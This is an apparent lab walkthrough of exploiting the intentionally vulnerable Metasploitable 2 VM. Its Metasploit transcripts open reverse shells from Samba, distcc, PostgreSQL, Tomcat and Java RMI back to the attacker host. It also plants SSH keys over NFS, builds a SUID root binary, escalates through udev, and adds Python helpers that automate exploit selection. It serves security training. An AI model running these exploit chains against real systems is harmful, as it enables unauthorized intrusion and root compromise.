Metasploitable 2 walkthrough with Metasploit

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. It can be used to conduct security training, test security tools, and practice common penetration testing techniques. A test environment gives you a safe place to do this; all it needs is a Metasploit instance that can reach the vulnerable target. This set of articles discusses the red team's tools and routes of attack and outlines many of the security flaws in the Metasploitable 2 image. Still missing is documentation of the web server and web application flaws, and of the vulnerabilities that let a local user escalate to root.

In Part 1 we covered some examples of service vulnerabilities, server backdoors and web application vulnerabilities. Here in Part 2 we continue with the remaining services and web applications in the VM, and with what to do once the shell you obtain is not root. Our earlier article on how to install Metasploitable covered the creation and configuration of the penetration testing lab, and a video tutorial on installing Metasploitable 2 is also available (in the video the Metasploitable 2 host runs at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3).

Lab setup

The setup is an attacker running Kali Linux and a target running the Linux-based Metasploitable, both as VMs in VirtualBox. Download the image from https://sourceforge.net/projects/metasploitable/ (or via https://information.rapid7.com/metasploitable-download.html). After you have downloaded the Metasploitable 2 archive, unzip it to get the virtual disk, then select the virtual machine in VirtualBox and click the Settings button to attach it to the lab network. Be sure your Kali VM is on the same "Host-only Network" before starting the scan, so you can communicate with the target; on that network addresses are assigned starting from 101. In this walkthrough the attacker is 192.168.127.159 and the target is 192.168.127.154; the transcripts borrowed from the Rapid7 guide use 192.168.99.128 and 192.168.99.131 instead, so substitute your own addresses.

Starting Metasploit

I follow three phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. Start the framework by typing msfconsole on the Kali prompt, or from the menu via Applications > Exploitation Tools > Metasploit. The interface looks like a Linux command-line shell; if you prefer a GUI, Armitage is a very user-friendly front end to the same framework.

Reconnaissance

The nmap command below uses a few flags to conduct the initial scan: the full TCP port range, and -A for service version and OS detection.

nmap -p1-65535 -A 192.168.127.154

Metasploitable 2 is also a good target for a vulnerability scanner. Nessus (first released in 1998 by Renaud Deraison, now published by Tenable Network Security; OpenVAS is the GPL spin-off of Nessus 2) reported over 60 vulnerabilities on Metasploitable, similar in kind to those on the Windows target. A few programs and services on the image have been deliberately backdoored; the simplest is the "Ingres lock" bind shell on port 1524, which hands a root shell to anyone who connects with telnet or netcat.

Identifying service versions

Before picking an exploit, confirm what is really listening. Scanner modules take a host range in RHOSTS:

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(telnet_version) > run

Samba "username map script" command execution (ports 139 and 445)

nmap reports Samba on 139 and 445, but the exact version running on those ports is unknown. Initially, to get the server version, we use the smb_version auxiliary module:

msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.127.154  yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(smb_version) > run

With the version in hand we can use the matching exploit, Samba "username map script" Command Execution (exploit/multi/samba/usermap_script), with a command-shell payload that connects back to us:

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

msf exploit(usermap_script) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the second client connection...
[*] Command: echo ZeiYbclsufvu4LGM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] A is input...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300

whoami

Samba runs the injected command as root, so no privilege escalation is needed from this session.

vsftpd 2.3.4 backdoor (port 21)

The vulnerability demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftpd. A login attempt whose username ends in ":)" makes the daemon open a shell on port 6200, which you can then reach directly:

root@ubuntu:~# telnet 192.168.99.131 6200

Metasploit automates the trigger with exploit/unix/ftp/vsftpd_234_backdoor (RPORT 21 is the target port; the payload is cmd/unix/interact). The module logs the FTP exchange as it goes, for example:

[*] USER: 331 Please specify the password.

UnrealIRCd 3.2.8.1 backdoor (port 6667)

The IRC daemon on 6667 is the backdoored UnrealIRCd 3.2.8.1 release. Only RHOST needs to be set:

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Writing to socket A
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Found shell.
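To tie the scan to the module choices above, here is an added Python example (my own code, not from the original article and not part of Metasploit) that parses nmap's grepable output for one host, maps each identified service to the modules used in this walkthrough, and writes the result as an msfconsole resource script. The scan text is a constructed sample with banners typical of Metasploitable 2; the addresses 192.168.127.154 and 192.168.127.159 and the module/option pairs come from the sections above. Run the generated script only against your own lab.

```python
"""Triage an nmap scan of Metasploitable 2 into the Metasploit modules used in this walkthrough."""
import re

# Constructed sample of `nmap -oG` (grepable) output; banners are typical of
# Metasploitable 2 but the text is hand-written for this example, not captured.
SAMPLE_GNMAP = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.168.127.154 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "23/open/tcp//telnet//Linux telnetd/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "1099/open/tcp//java-rmi//GNU Classpath grmiregistry/, "
    "1524/open/tcp//bindshell//Metasploitable root shell/, "
    "2049/open/tcp//nfs//2-4 (RPC #100003)/, "
    "3632/open/tcp//distccd//distccd v1 ((GNU) 4.2.4)/, "
    "5432/open/tcp//postgresql//PostgreSQL DB 8.3.0 - 8.3.7/, "
    "6667/open/tcp//irc//UnrealIRCd/, "
    "8180/open/tcp//http//Apache Tomcat/Coyote JSP engine 1.1/"
    "\tIgnored State: closed (65525)\n"
)


def parse_nmap_grepable(text):
    """Return a list of {'host','port','service','version'} for every open port."""
    found = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        match = re.search(r"Ports: ([^\t]*)", line)
        if not match:
            continue
        for entry in match.group(1).split(", "):
            # Field order is port/state/proto/owner/service/rpc/version/; the
            # version may itself contain '/', so split at most six times.
            fields = entry.split("/", 6)
            if len(fields) < 7 or fields[1] != "open":
                continue
            found.append({"host": host, "port": int(fields[0]),
                          "service": fields[4], "version": fields[6].rstrip("/")})
    return found


def plan_modules(services, rhost, lhost):
    """Map each service to the module(s) from the walkthrough, scanners first.

    Returns [(module_or_comment, {OPTION: value, ...}), ...] in run order."""
    plan, seen = [], set()

    def add(module, **opts):
        if module not in seen:          # 139 and 445 both map to Samba; add once
            seen.add(module)
            plan.append((module, opts))

    for svc in services:
        port, ver = svc["port"], svc["version"]
        if port == 21 and "vsftpd 2.3.4" in ver:
            add("exploit/unix/ftp/vsftpd_234_backdoor", RHOST=rhost)
        elif port == 23:
            add("auxiliary/scanner/telnet/telnet_version", RHOSTS=rhost)
        elif port in (139, 445) and "Samba" in ver:
            add("auxiliary/scanner/smb/smb_version", RHOSTS=rhost)
            add("exploit/multi/samba/usermap_script",
                RHOST=rhost, PAYLOAD="cmd/unix/reverse", LHOST=lhost)
        elif port == 1099:
            add("exploit/multi/misc/java_rmi_server",
                RHOST=rhost, PAYLOAD="java/meterpreter/reverse_tcp", LHOST=lhost)
        elif port == 1524:
            add(f"# port 1524 is a bind shell: `nc {rhost} 1524` gives root directly")
        elif port == 2049:
            add(f"# NFS export: check with `showmount -e {rhost}` before mounting")
        elif port == 3632:
            add("exploit/unix/misc/distcc_exec",
                RHOST=rhost, PAYLOAD="cmd/unix/reverse", LHOST=lhost)
        elif port == 5432:
            add("auxiliary/scanner/postgres/postgres_login",
                RHOSTS=rhost, STOP_ON_SUCCESS="true")
            add("exploit/linux/postgres/postgres_payload",
                RHOST=rhost, USERNAME="postgres", PASSWORD="postgres", LHOST=lhost)
        elif port == 6667:
            add("exploit/unix/irc/unreal_ircd_3281_backdoor", RHOST=rhost)
        elif "Tomcat" in ver:
            add("auxiliary/admin/http/tomcat_administration", RHOSTS=rhost, RPORT=port)
            add("exploit/multi/http/tomcat_mgr_deploy", RHOST=rhost, RPORT=port,
                USERNAME="tomcat", PASSWORD="tomcat", LHOST=lhost)
    return plan


def render_rc(plan):
    """Emit an msfconsole resource script (run with `msfconsole -r plan.rc`).

    Exploits are started with `exploit -j` so each session is backgrounded
    and the script continues to the next module."""
    lines = []
    for module, opts in plan:
        if module.startswith("#"):       # informational entry, no module to run
            lines.append(module)
            continue
        lines.append(f"use {module}")
        lines.extend(f"set {key} {value}" for key, value in opts.items())
        lines.append("run" if module.startswith("auxiliary/") else "exploit -j")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    services = parse_nmap_grepable(SAMPLE_GNMAP)
    print(render_rc(plan_modules(services, "192.168.127.154", "192.168.127.159")))
```

The scanner modules are deliberately emitted before the exploit that depends on them, so reading the script top to bottom mirrors the order of the sections above; save the output as plan.rc and feed it to msfconsole -r.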
distccd command execution (port 3632)

distcc makes it easy to scale large compiler jobs across a farm of like-configured systems, and Metasploitable runs the distccd daemon with no authentication. Metasploit has an exploit available: exploit/unix/misc/distcc_exec uses a documented flaw in distccd to run arbitrary commands on any system operating it.

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

msf exploit(distcc_exec) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(distcc_exec) > exploit

The resulting shell belongs to the daemon user, so we again have to elevate our privileges from here. That works with the udev exploit described in the privilege escalation section, so it is not repeated here.

PostgreSQL: default credentials and postgres_payload (port 5432)

Start with the postgres_login scanner, which tries user/password pairs from a wordlist; set STOP_ON_SUCCESS so it stops at the first hit:

msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name             Current Setting                                                               Required  Description
   ----             ---------------                                                               --------  -----------
   BLANK_PASSWORDS  false                                                                         no        Try blank passwords for all users
   PASSWORD                                                                                       no        A specific password to authenticate with
   RHOSTS           192.168.127.154                                                               yes       The target address range or CIDR identifier
   RPORT            5432                                                                          yes       The target port
   STOP_ON_SUCCESS  false                                                                         yes       Stop guessing when a credential works for a host
   THREADS          1                                                                             yes       The number of concurrent threads
   USERNAME         postgres                                                                      no        A specific username to authenticate as
   USERPASS_FILE    /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   VERBOSE          true                                                                          yes       Whether to print output for all attempts

msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > run

[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'

The very first pair, postgres/postgres, succeeds. With that we can use exploit/linux/postgres/postgres_payload, which loads a shared object into the server and gets a shell as the database's OS user. Because the payload runs as the constructor of that shared object, it does not have to adhere to a particular Postgres API version:

msf exploit(postgres_payload) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(postgres_payload) > exploit

The shell runs as the postgres user, so this too is a foothold rather than root.

MySQL: no password on the root account (port 3306)

The MySQL server accepts a connection to an account that is not password-protected, which lets an attacker launch further attacks against the database. Since we noticed the database was not secured by a password, we first confirmed it with the mysql_login brute-force auxiliary module, then simply connected with the ordinary client:

mysql -h 192.168.127.154 -u root
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Type 'help;' or '\h' for help.

From that prompt, display the server version, the name of the current database and the tables in information_schema to map what the server holds.

Apache Tomcat (port 8180)

Let's first see what we can get from the Tomcat Administration Tool Default Access module (auxiliary/admin/http/tomcat_administration), which checks the admin application for default accounts:

msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

msf auxiliary(tomcat_administration) > run

With credentials (tomcat/tomcat on Metasploitable 2) we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit. This module executes a payload on Tomcat servers whose manager application is exposed: it uploads a WAR file through the manager and requests it. Metasploitable's Tomcat listens on 8180, so set RPORT accordingly:

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.127.159:4444
[*] Attempting to automatically select a target...

Java RMI registry (port 1099)

exploit/multi/misc/java_rmi_server takes advantage of the RMI Registry and RMI Activation Services default configuration, which allows classes to be loaded from any remote URL (HTTP). The module runs its own web server (SRVHOST) to serve the class loader; the target fetched it from http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar in this run.

msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.127.154  yes       The target address
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

msf exploit(java_rmi_server) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.127.159:4444
[*] Backgrounding session 1...

Web applications

Metasploitable 2 has deliberately vulnerable web applications pre-installed. In the current version as of this writing they are linked from the landing page on port 80; to access a particular application, click its link or append the application directory name to the target's base URL.

- DVWA is PHP-based, uses a MySQL database and is accessible with admin/password as login credentials.
- Mutillidae ships with security and hints switched to their default states, which can be changed via the Toggle Security and Toggle Hints buttons; three levels of hints are provided, ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (maximum hints).
- TWiki: the Nessus scan exposed the TWiki web application to remote code execution. An attacker can run arbitrary OS commands by passing a rev parameter containing shell metacharacters to the TWikiUsers script, and Metasploit's exploit/unix/webapp/twiki_history does exactly that (msf exploit(twiki_history) > show options lists the usual RHOST/RPORT/URI settings). Here's what is going on with this class of bug: the injected commands are executed with the same privileges as the web application, so a single unsanitised parameter turns into a shell as the web server user.
- phpinfo: an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. It provides internal system information and service version information that can be used to look up vulnerabilities, which is why such pages should never be left on a production host.
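The TWiki rev bug and Samba's username map script are the same primitive: user input pasted into a command line that a shell parses. This added Python example (my own code, not the article's and not from TWiki or Samba) reproduces the vulnerable pattern on a harmless echo command instead of the real rcs invocation, then shows the two halves of the fix: run the program without a shell so metacharacters are inert, and validate the parameter against the one shape it may take. The crafted revision value is constructed for the example.

```python
"""Shell metacharacter injection of the kind behind TWiki's rev parameter and
Samba's username map script, demonstrated on a harmless `echo` stand-in."""
import re
import subprocess

# An RCS revision looks like 1.2 (or 1.2.3); anything else has no business here.
REV_PATTERN = re.compile(r"^\d+(?:\.\d+)*$")

# Constructed attacker input: a valid-looking revision followed by a second command.
CRAFTED_REV = "1.2; echo INJECTED"


def history_unsafe(rev):
    """Vulnerable pattern: the request parameter is pasted into a command string
    that a shell parses, so ';', '|', backticks and $() inside `rev` run as the
    web server user. The real target builds `rcs -r<rev> ...`; `echo` stands in
    here so the example stays harmless and runs anywhere with /bin/sh."""
    command = f"echo revision {rev}"
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return result.stdout


def history_argv_only(rev):
    """Half a fix: no shell, so metacharacters are inert and `rev` is passed
    literally as one argument; but the value is still unvalidated and reaches
    the program, which may have its own parsing of it."""
    result = subprocess.run(["echo", "revision", rev], capture_output=True, text=True)
    return result.stdout


def history_safe(rev):
    """Hardened version: reject anything that is not a revision number, then pass
    the value as a single argv element. Raises ValueError on bad input."""
    if not REV_PATTERN.match(rev):
        raise ValueError(f"rejected revision parameter: {rev!r}")
    return history_argv_only(rev)


def demo(rev=CRAFTED_REV):
    """Run the three variants on the same input and return their outcomes."""
    try:
        safe = history_safe(rev)
    except ValueError as exc:
        safe = str(exc)
    return {"unsafe": history_unsafe(rev), "argv_only": history_argv_only(rev), "safe": safe}


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome!r}")
```

The unsafe variant prints a second line, INJECTED, proving the tail of the parameter ran as its own command; the argv-only variant prints the whole string literally; the hardened variant refuses it before anything runs. The usermap_script module exploits exactly the unsafe shape in Samba, with the Samba username as the injected parameter.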
Remote shell services: rsh and rlogin (ports 512 to 514)

Nessus was able to log in with rsh using common credentials identified by finger. Either the accounts are not password-protected, or the ~/.rhosts files are not properly configured (the Nessus plugin notes the issue is reported for Cisco Prime LAN Management Solution but may be present on any host that is not configured appropriately). So all we have to do is use the remote shell program to log in:

rlogin -l root 192.168.127.154
Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The kernel banner (2.6.24 on i686, i.e. Ubuntu 8.04) is worth noting: it tells us the udev exploit at the end of this article will apply.

NFS: root filesystem exported to everyone (port 2049)

Use the showmount command to see the export list of the NFS server; the root directory is shared with every client:

showmount -e 192.168.99.131
Export list for 192.168.99.131:
/ *

Getting access to a system with a writeable filesystem like this is trivial. Generate an SSH key on the attacker, mount the export and append the public key to root's authorized_keys, then log in with the matching private key:

root@ubuntu:~# ssh-keygen
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Your identification has been saved in /root/.ssh/id_rsa.
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t
root@ubuntu:~# ssh root@192.168.99.131
Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128

The same share gives a second route to root. Because the export does not squash root, a file you create over NFS as root is owned by root on the target. Write a small C program (root.c) that sets its user id to 0 and executes a shell, compile it and set the SUID bit:

gcc root.c -o rootme
chmod 4755 rootme

Then copy the compiled binary into the msfadmin directory in the NFS share and run it from any low-privileged shell on the target; it drops you to a root prompt (confirm with whoami).

The msfadmin account

Narrowing the focus to SSH, we used an auxiliary module (the ssh_login scanner) against port 22 and it turned up the msfadmin account credentials. If you log in and play around you will find that this account has sudo rights, so you can execute commands as root. Some quick orientation from that shell: redirect the output of uname -r into a file (uname -r > uname.txt), display the new file with cat, run ifconfig eth0 to see the interface configuration, and whoami to confirm which user you are.

Privilege escalation with the udev netlink bug

Footholds obtained through distcc, PostgreSQL or Tomcat are unprivileged, and the kernel banner seen above means the udev netlink vulnerability applies: udev before version 141 does not verify that netlink messages come from the kernel, so a local user can make udevd run a script as root. The public exploit (exploit-db 8572) needs the PID of udevd's netlink socket, which is listed in the Pid column of /proc/net/netlink and is usually one less than the udevd PID:

ps aux | grep udev
cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8cc200 15  2767   00000001 0        0        00000000 2

Transfer the exploit to the target with netcat (listener on the attacker, serving the file) and compile it there:

nc -vv -l -p 5555 < 8572

Metasploit can drive the very same vulnerability from an existing session with exploit/linux/local/udev_netlink; point its SESSION option at the foothold and run it:

msf exploit(udev_netlink) > show options

Did this walkthrough help? If so please share your comments below.
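Picking the right PID for the udev exploit is the step people get wrong, so here is an added Python example (my own, not the article's and not part of exploit 8572 or Metasploit) that parses /proc/net/netlink for user-space NETLINK_KOBJECT_UEVENT sockets, reads udevd's PID from ps aux, and cross-checks the two. Both inputs are constructed samples; the uevent row copies the numbers shown above, and the udevd PID of 2768 is an assumption chosen to match it.

```python
"""Locate udevd and the PID of its NETLINK_KOBJECT_UEVENT socket, the value the
udev netlink exploit (exploit-db 8572) takes as its argument."""

NETLINK_KOBJECT_UEVENT = 15   # the 'Eth' (protocol) column value for uevent sockets

# Constructed samples standing in for `cat /proc/net/netlink` and `ps aux` on
# the target. The uevent row repeats the walkthrough's numbers; the udevd PID
# (2768) is assumed so that the "udevd PID minus one" rule can be shown.
SAMPLE_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8cc200 15  2767   00000001 0        0        00000000 2
df8c8400 15  0      00000000 0        0        00000000 2
df8c6a00 0   0      00000000 0        0        00000000 2
df8c4c00 9   0      00000000 0        0        00000000 2
"""

SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   12:01   0:00 /sbin/init
root      2768  0.0  0.0   2216   648 ?        S<s  12:01   0:00 /sbin/udevd --daemon
msfadmin  4711  0.0  0.0   3004   828 pts/0    R+   12:30   0:00 ps aux
"""


def uevent_socket_pids(netlink_text):
    """PIDs of user-space NETLINK_KOBJECT_UEVENT sockets (Pid 0 is the kernel's own)."""
    pids = []
    for line in netlink_text.splitlines()[1:]:           # skip the header row
        cols = line.split()
        if len(cols) < 3 or not (cols[1].isdigit() and cols[2].isdigit()):
            continue
        if int(cols[1]) == NETLINK_KOBJECT_UEVENT and int(cols[2]) != 0:
            pids.append(int(cols[2]))
    return pids


def udevd_pid(ps_text):
    """PID of the udevd daemon from `ps aux` output, or None if it is not running."""
    for line in ps_text.splitlines()[1:]:
        cols = line.split(None, 10)                       # COMMAND is the 11th field
        if len(cols) > 10 and "udevd" in cols[10] and "grep" not in cols[10]:
            return int(cols[1])
    return None


def pick_netlink_pid(netlink_text, ps_text):
    """Return the PID to hand to the exploit.

    Prefer the uevent socket whose PID is exactly one less than udevd's PID
    (the usual layout on the vulnerable udev); otherwise fall back to the first
    user-space uevent socket, or None when there is nothing to exploit."""
    candidates = uevent_socket_pids(netlink_text)
    daemon = udevd_pid(ps_text)
    for pid in candidates:
        if daemon is not None and pid == daemon - 1:
            return pid
    return candidates[0] if candidates else None


if __name__ == "__main__":
    print("udevd PID:", udevd_pid(SAMPLE_PS))
    print("netlink PID for the exploit:", pick_netlink_pid(SAMPLE_NETLINK, SAMPLE_PS))
```

On the real target, replace the two samples with the output of cat /proc/net/netlink and ps aux; if the function returns None, udevd is either not running or has no user-space uevent socket, and the exploit will not work regardless of the PID you pass.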